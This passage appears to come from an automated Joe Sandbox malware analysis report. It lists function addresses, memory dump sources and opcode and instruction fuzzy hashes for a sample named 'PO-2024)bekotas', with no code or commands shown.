                                        Function 00F0D4BF Relevance: .1, Instructions: 56COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2013847408.0000000000F0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F0D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_f0d000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                        • Instruction ID: 664a6e418a0e46dd5fa2daa33f29ec38acd749a4662cbef4c8a11ed5ab655bc5
                                        • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                        • Instruction Fuzzy Hash: 4F110672804240CFCB16CF54D9C4B26BF71FB98324F28C5A9DC450B256C336D45AEBA1
                                        Function 00F0D3D3 Relevance: .1, Instructions: 56COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2013847408.0000000000F0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F0D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_f0d000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                        • Instruction ID: 3e439a9e82ea31a825921701b6d6111c6c0ace4087b4b87b22bf24dbdd82e600
                                        • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                        • Instruction Fuzzy Hash: 2E110376804240CFCB16CF44D5C4B16BF71FB94324F24C6A9D9090B256C33AE85AEBA2
                                        Function 050F9E5A Relevance: .1, Instructions: 56COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fa5b30fd43b8dd7ff235119356d6b1acf2a9a6c26108c9d14d806d6d45c08555
                                        • Instruction ID: 9cf35e39fc41e25be4f0ad770345868cd592f4633da32a1944faa5ebc2676b3e
                                        • Opcode Fuzzy Hash: fa5b30fd43b8dd7ff235119356d6b1acf2a9a6c26108c9d14d806d6d45c08555
                                        • Instruction Fuzzy Hash: F411C431B146114BD318EB28D891B5F77DBFB88704F51492AD686C7781DF71F8028790
                                        Function 050F9E60 Relevance: .1, Instructions: 55COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1164c404721767fd9b030f21612af25378f7abc86720e9cbc487708564fd946b
                                        • Instruction ID: 3c94f9d3586684f774d5cddaa24eadb0b12b238d968a80b19d91d8d0080e5be6
                                        • Opcode Fuzzy Hash: 1164c404721767fd9b030f21612af25378f7abc86720e9cbc487708564fd946b
                                        • Instruction Fuzzy Hash: E211C031B146018BE728EB28D891B9F77DBFB88704F51492AD686C7781CFB1E8028790
                                        Function 00F1D1CF Relevance: .1, Instructions: 53COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2013939455.0000000000F1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F1D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_f1d000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                        • Instruction ID: 206386f205f8131003e9374178d6e85d5f2f8f867b7f23246662c96ebc84010d
                                        • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                        • Instruction Fuzzy Hash: A611BB75904280DFCB06CF14C9C4B15BBB1FB84324F24C6A9D8494B696C33AD84ADB62
                                        Function 050F4228 Relevance: .1, Instructions: 53COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fe808763fc8a2945f6a58d1f950104438a0d9bd87bd7b5c60f02eaaa851b0422
                                        • Instruction ID: 0cfb3b0d8e4bb2761529a2a951c67dd43d3921ad850175ce97a6fe5312614c95
                                        • Opcode Fuzzy Hash: fe808763fc8a2945f6a58d1f950104438a0d9bd87bd7b5c60f02eaaa851b0422
                                        • Instruction Fuzzy Hash: D8018C307093128ADFE5AAA5B9842BF77EAAF85504F8440798E06C3A81EF24D841C355
                                        Function 050F6550 Relevance: .1, Instructions: 52COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7cf8e5a35b8bc80b52ef219adfb90dc9affd8ba258fd6670b42222fb59f99e82
                                        • Instruction ID: 7efdd7c0beccca403283e1c111d66f48fe0602fb01175f1e025c0601e6ff2d49
                                        • Opcode Fuzzy Hash: 7cf8e5a35b8bc80b52ef219adfb90dc9affd8ba258fd6670b42222fb59f99e82
                                        • Instruction Fuzzy Hash: 7001B171F011955FCF02A7B8B8656FFBFB9EF9A610F080069EA84A7241D9254902C7D5
                                        Function 050F4778 Relevance: .1, Instructions: 51COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 798f692e500dbd73e5ceef3d8345f1f7f531f13295ffcf7346f6e384bc2e6ebf
                                        • Instruction ID: 2a5f83a013a1bd22540b6de5d29360b034fb52241be7030bbd92e2ed75d925af
                                        • Opcode Fuzzy Hash: 798f692e500dbd73e5ceef3d8345f1f7f531f13295ffcf7346f6e384bc2e6ebf
                                        • Instruction Fuzzy Hash: 641104B5C046499FCB10DF9AD944ADEFBF5FB49314F10841AE51AA7310D378A944CFA1
                                        Function 050F6518 Relevance: .0, Instructions: 50COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1b41d40de8ed5e778da2c93aac5e441d45a5e2711d83e0af2ddac0624f9677c7
                                        • Instruction ID: 8d958612e5c2235bd8d5fa04a64b387c8777807c4837b0ac282890b94e59359d
                                        • Opcode Fuzzy Hash: 1b41d40de8ed5e778da2c93aac5e441d45a5e2711d83e0af2ddac0624f9677c7
                                        • Instruction Fuzzy Hash: F20149317082586FCB08D7BCA8546EE7FEEDF86210F0484A6E54CC3301ED719C428391
                                        Function 050F5C31 Relevance: .0, Instructions: 49COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3393c3223ccbaeec91ab1b352e4ddd8d6f05ff4b42f9dbc5d8aaa93c502d2056
                                        • Instruction ID: 4e00b756b1473ebee530b6a35eede089d0e5033f6bd63c49b8e05336ef3a2e8e
                                        • Opcode Fuzzy Hash: 3393c3223ccbaeec91ab1b352e4ddd8d6f05ff4b42f9dbc5d8aaa93c502d2056
                                        • Instruction Fuzzy Hash: 911132B1C006488FCB10DF9AD944ADEFFF8FB48320F14841AE819A3210D378A545CFA1
                                        Function 050F4902 Relevance: .0, Instructions: 48COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c5b0ee0f714b551c2b481c5b968d4b979072aa6c31da83299a2f7d8555bfc9a8
                                        • Instruction ID: 349fd5b2a28561bc0faba7d99e6ac9f6c0ac0ba87c1f6f0fc9a0207f884576a5
                                        • Opcode Fuzzy Hash: c5b0ee0f714b551c2b481c5b968d4b979072aa6c31da83299a2f7d8555bfc9a8
                                        • Instruction Fuzzy Hash: 60117030E041058FDF14EF64E0547AE7AA2EB44700F144868D901A7695DB784985CBA6
                                        Function 050F6D1C Relevance: .0, Instructions: 47COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 04304d8d2bd6f27bf9dd897398e567512f55253609db8a677a79fddd0af11ce5
                                        • Instruction ID: 08b7c39f8f3b352bd983ba4fbe22bdac16604efe476be5d1eb03d0fa41c2b76d
                                        • Opcode Fuzzy Hash: 04304d8d2bd6f27bf9dd897398e567512f55253609db8a677a79fddd0af11ce5
                                        • Instruction Fuzzy Hash: 241103B59042489FCB20DF9AD545BDEFBF4FB48320F20845AE919A7700D379A944CFA5
                                        Function 050F6CC8 Relevance: .0, Instructions: 47COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ae3e77d565803a471849f517582e947f8507b76e84387b145165835626a5de16
                                        • Instruction ID: 7c97ac5e6e2f20d4dd487cbb47dabdc4a2cce04dfda180d572f946f4414a7313
                                        • Opcode Fuzzy Hash: ae3e77d565803a471849f517582e947f8507b76e84387b145165835626a5de16
                                        • Instruction Fuzzy Hash: 501106B59042489FCB20DF9AD545BDEFBF4FB48310F108459D919A7700D379A944CFA5
                                        Function 050F730A Relevance: .0, Instructions: 46COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8a6014b9b68b79b1272325f9f23f82577b77e28d67109e4e4e784c45a0657d9b
                                        • Instruction ID: f51f76222e100680aeb7a53677a718b2baed98956fdad9ab6538c7e37d38957a
                                        • Opcode Fuzzy Hash: 8a6014b9b68b79b1272325f9f23f82577b77e28d67109e4e4e784c45a0657d9b
                                        • Instruction Fuzzy Hash: 5511F2B58002499FCB20DFAAD545BDEFBF4EB48320F24841AD919A7700D379A544CFA5
                                        Function 050FFE48 Relevance: .0, Instructions: 46COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a6ca0e4ce364fe410e4d4555f2f6421fc20b4561ef5fbe87b23d0aeff07c7177
                                        • Instruction ID: 737a8ba4e88718cb98b40829179fd71e81663e4a825e13748be4465451a79f00
                                        • Opcode Fuzzy Hash: a6ca0e4ce364fe410e4d4555f2f6421fc20b4561ef5fbe87b23d0aeff07c7177
                                        • Instruction Fuzzy Hash: 7B01F23271460AA7C318CE2EA98561ABAAFBBD4B10B54D53BA609C3A52DB34D91087D1
                                        Function 00F0D759 Relevance: .0, Instructions: 45COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2013847408.0000000000F0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F0D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_f0d000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3a069ac86b22ed0ac130d87cf54749dd74030622368228ec5597f222b19b4f10
                                        • Instruction ID: f65fb34952754e6542b4aa64889cc8ce085fd980fe56bd6b2b577e923772486e
                                        • Opcode Fuzzy Hash: 3a069ac86b22ed0ac130d87cf54749dd74030622368228ec5597f222b19b4f10
                                        • Instruction Fuzzy Hash: A301DB72405344DAD7208B99CD84B67FF9CEF95774F18C52AED094A2C6C3799840FA71
                                        Function 050F85C8 Relevance: .0, Instructions: 43COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e71351d2ce4fba559eca703a3b15546be63ec8e41e496434fff30d1eb4e271b5
                                        • Instruction ID: 685b55ef49eea4d0a92d154e549a84ddc7adca8019c098edfaedeca3298ec56a
                                        • Opcode Fuzzy Hash: e71351d2ce4fba559eca703a3b15546be63ec8e41e496434fff30d1eb4e271b5
                                        • Instruction Fuzzy Hash: D6F0543275021417EB286569BC95BFF32CB9BC5B55F08843AE70ADB6C0CDB5984283D5
                                        Function 050FBAD9 Relevance: .0, Instructions: 43COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 73eee70128f40815b34997198f36a3cf4a8cb125e3ffa6956280202d22bfb10d
                                        • Instruction ID: 4bd962b060aa0d9c987b5ea1a3366cac8c7f3fdc357e3e34e757603353f247f0
                                        • Opcode Fuzzy Hash: 73eee70128f40815b34997198f36a3cf4a8cb125e3ffa6956280202d22bfb10d
                                        • Instruction Fuzzy Hash: 9D017131214600CFC725DB28E450D6EB7EAFF85320B54C1B9D545876AADBB5DC06CF50
                                        Function 050FFE58 Relevance: .0, Instructions: 42COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 68e826a862699699d758a6875c41a850b819e0fee39c6f63b3e22a2ac22ef8f7
                                        • Instruction ID: 1a909267882db02bcba0462e49e3e5a26b3d47a880eb5c57e69325b4296be32c
                                        • Opcode Fuzzy Hash: 68e826a862699699d758a6875c41a850b819e0fee39c6f63b3e22a2ac22ef8f7
                                        • Instruction Fuzzy Hash: A3F02231714A1A97C318CE6EA98051BF6AFBBC4B10314C13BA20DC3A62CF70ED1187D1
                                        Function 050FBAE8 Relevance: .0, Instructions: 41COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 66829ae754c098ce1f3b4c3083a498c7730235badd2073af61a03ee3fbf1acd7
                                        • Instruction ID: 3153cb3594629dd889d3e95a12033424f3064df61c34520749152f6c50558d04
                                        • Opcode Fuzzy Hash: 66829ae754c098ce1f3b4c3083a498c7730235badd2073af61a03ee3fbf1acd7
                                        • Instruction Fuzzy Hash: 82016D30314200DFC718EB69E450E2AB3EAFF85320B54C479D60A8776ADBB1EC02CB90
                                        Function 050F6578 Relevance: .0, Instructions: 40COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 30581b8f8b8545e77cef9386408435c52c3ca241b1d8ee84c1cc2f908d51a969
                                        • Instruction ID: 458e5e1a38734eb302ae48d56f52c812d238fd3bd9819f58d74e146a538dc8a9
                                        • Opcode Fuzzy Hash: 30581b8f8b8545e77cef9386408435c52c3ca241b1d8ee84c1cc2f908d51a969
                                        • Instruction Fuzzy Hash: 8CF09671F001155B8F06B7B8B8554FFBABAAB98610B040029DA05A7741CA310E0287E5
                                        Function 050F6ED0 Relevance: .0, Instructions: 37COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1e649633ca39585fb4b1c510976451ee0ca98a76347f336d641e1e4ba6af97eb
                                        • Instruction ID: 36892660c1122340ceddb0d7ef5f7095eb2989e4b449d277dc3f0cd52b279a69
                                        • Opcode Fuzzy Hash: 1e649633ca39585fb4b1c510976451ee0ca98a76347f336d641e1e4ba6af97eb
                                        • Instruction Fuzzy Hash: 27F020B27041247F9B04CAA8AC18BFF7FFCE786664B040069A909C3600EA628C0283A0
                                        Function 00F0D758 Relevance: .0, Instructions: 36COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2013847408.0000000000F0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F0D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_f0d000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: efce43e6ef040be3b6fd7b5f8f98b47e0f2201c1927d7c3f5146c473328b085c
                                        • Instruction ID: 565ac74b6909918f8c1aece25ccec9766880b26bc3b42e0cece2a46279ed6060
                                        • Opcode Fuzzy Hash: efce43e6ef040be3b6fd7b5f8f98b47e0f2201c1927d7c3f5146c473328b085c
                                        • Instruction Fuzzy Hash: DFF0C271805344DEE7208A06CC84BA2FFA8EF91734F18C45AED080A286C3799840EAB1
                                        Function 050FCF40 Relevance: .0, Instructions: 34COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c291dc6bd062aa4c1778503055616a2a1b95c8b320f083a0ebfbecd26bc1bf78
                                        • Instruction ID: b433cfb106a276013910ec19bc5c7cd1666a90fb1cc8c94642af914ab4ae2814
                                        • Opcode Fuzzy Hash: c291dc6bd062aa4c1778503055616a2a1b95c8b320f083a0ebfbecd26bc1bf78
                                        • Instruction Fuzzy Hash: C3F0E27060D348AEEB51A664A40672EBBE4AB41708F58C0AEE50C8A943C167CC4B9756
                                        Function 050F3BE1 Relevance: .0, Instructions: 32COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a7f071e6c061e9bb7dea0309b13acb614c2ea5c028ef1f95044245b58075b73c
                                        • Instruction ID: c10c21c826fa504c0ea9536402fb2debb0effe34048d1f98073b1ae5f016c6e6
                                        • Opcode Fuzzy Hash: a7f071e6c061e9bb7dea0309b13acb614c2ea5c028ef1f95044245b58075b73c
                                        • Instruction Fuzzy Hash: A6F0F935A001188FCB54EB58E5849DCB3F5FF8C725B154099D905B7365CB35AD45CB90
                                        Function 050F4218 Relevance: .0, Instructions: 31COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d4839d272cc7ef09d80bf35f24ab5b1ad592498ee49974749a89debf2df5d656
                                        • Instruction ID: 3a4bc0295c7ae479743d128b2197bc6ec61bb784bf35458415d7e636b7086f84
                                        • Opcode Fuzzy Hash: d4839d272cc7ef09d80bf35f24ab5b1ad592498ee49974749a89debf2df5d656
                                        • Instruction Fuzzy Hash: 7EF0A03250C204AADF91CB95F8407EFBFE9AB86214F8941BADE08C2A41E6309440C761
                                        Function 050F9F3A Relevance: .0, Instructions: 30COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ce19b77aef30a109c253f62705ea524319018c0ed608a967eef7cb241c2ae36b
                                        • Instruction ID: 6bd56930753e6bf45535ef6fab46c76cc538906266154d2c3b70fddcd6e15103
                                        • Opcode Fuzzy Hash: ce19b77aef30a109c253f62705ea524319018c0ed608a967eef7cb241c2ae36b
                                        • Instruction Fuzzy Hash: 02F0A735A00219AFCF109A6DD8097DEBBF5FB84315F008425E985D3344D734690ACFC5
                                        Function 050FB8A0 Relevance: .0, Instructions: 30COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 116cf81bf87e497b8eecacd91b299db3e473d0e40a3a6c00edf5b01e5be2ffcb
                                        • Instruction ID: df318365b82fec8fc11b66911bdc5efb9bf5c7df4a9b1ad36175f405221bbed1
                                        • Opcode Fuzzy Hash: 116cf81bf87e497b8eecacd91b299db3e473d0e40a3a6c00edf5b01e5be2ffcb
                                        • Instruction Fuzzy Hash: D8F05E36A0424CAB9F619E64EC048DE3BA0EF09226B058562FBA4D6551D378DA24DB92
                                        Function 050FDB8C Relevance: .0, Instructions: 30COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1ff57446c2d8827ef6992798711e5cae4f70270664118294bd128c030ea9ebd8
                                        • Instruction ID: 4d0d8f0b2708c1926067d0913c97626ab5c295b6cb8ac127d79020421807ec3f
                                        • Opcode Fuzzy Hash: 1ff57446c2d8827ef6992798711e5cae4f70270664118294bd128c030ea9ebd8
                                        • Instruction Fuzzy Hash: 22F01732A04105CFDB40EE68F4897EC33F2BB44326F444465D20AA7AA0CB74D986CB60
                                        Function 050F495D Relevance: .0, Instructions: 29COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6ff447ecd9bdbdea5ef00ea4a48f17f84793d977ca719980bc7c8cf81eb9f144
                                        • Instruction ID: be81a94c62da7f58e3afc90bc4b391eacfc35d0f3af32fa58384763ccccdf17d
                                        • Opcode Fuzzy Hash: 6ff447ecd9bdbdea5ef00ea4a48f17f84793d977ca719980bc7c8cf81eb9f144
                                        • Instruction Fuzzy Hash: 5FF05430B0020ACBDF14FF75D4157AE7AB2EF85705F008868D505AB691DF788945DFA6
                                        Function 050F7F98 Relevance: .0, Instructions: 28COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 95f995e74acebb8fa9aa021503428c5760f516f88d34ab2205511d7fa7b667e8
                                        • Instruction ID: 8c37d7bb901d6bcd94fbb038c09b46e5c3cec848939b069988a758bc141cf1b1
                                        • Opcode Fuzzy Hash: 95f995e74acebb8fa9aa021503428c5760f516f88d34ab2205511d7fa7b667e8
                                        • Instruction Fuzzy Hash: BDF0393151524AAFEB10DFA5DD036AD77A8EF01298B1800A4A805E7266FA39EA55DB10
                                        Function 050FCE28 Relevance: .0, Instructions: 28COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 94d90ed884ad94071727ae85e44721b71bffc5a1fe449a89f1582865e81a886e
                                        • Instruction ID: 7930527c00504de9a50d13403b14acfffffa00994bf63cf334811370861b5ef9
                                        • Opcode Fuzzy Hash: 94d90ed884ad94071727ae85e44721b71bffc5a1fe449a89f1582865e81a886e
                                        • Instruction Fuzzy Hash: 9CF02E722046845FCB079B58E400A9D7FA9DF8A311B054557F494C7162C7788915CB61
                                        Function 050F9F48 Relevance: .0, Instructions: 25COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017233756.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_50f0000_PO-2024)bekotas.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a2659f58fa1f768f92ae93d4f0751317146fc30df677ef7a1fcabddb3ca3b12c
                                        • Instruction ID: 259f823a808efb93e87651a29ef0756fc296a0ca8935be585036f0b15d09e80a
